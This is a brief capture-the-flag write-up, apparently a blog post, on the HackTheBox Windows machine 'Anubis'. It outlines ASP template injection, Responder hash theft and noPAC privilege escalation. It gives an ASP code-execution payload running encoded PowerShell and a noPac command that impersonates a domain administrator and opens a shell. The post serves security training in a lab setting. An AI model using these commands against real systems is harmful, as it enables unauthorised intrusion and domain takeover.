Post

ASP, Windows Containers, Responder & NoPAC - Anubis @ HackTheBox

We are solving Anubis, a 50-point windows machine on HackTheBox which involves an ASP template injection, windows containers, and stealing hashes with Responder. Later we’ll escalate privileges using noPAC.

Notes

ASP Injection

1
<% CreateObject("WScript.Shell").Exec("powershell -enc ...") %>

noPAC

1
2
3
4
# https://github.com/Ridter/noPac
proxychains -q crackmapexec smb 172.31.48.1 -u localadmin -p 'Secret123!' --no-bruteforce
sudo date -s "$(curl -sI https://windcorp.htb -k | grep -i '^date:'|cut -d' ' -f2-)"
proxychains -q python3 noPac.py windcorp.htb/localadmin:'Secret123' -dc-ip 172.31.48.1 -dc-host EARTH -shell --impersonate administrator
This post is licensed under CC BY 4.0 by the author.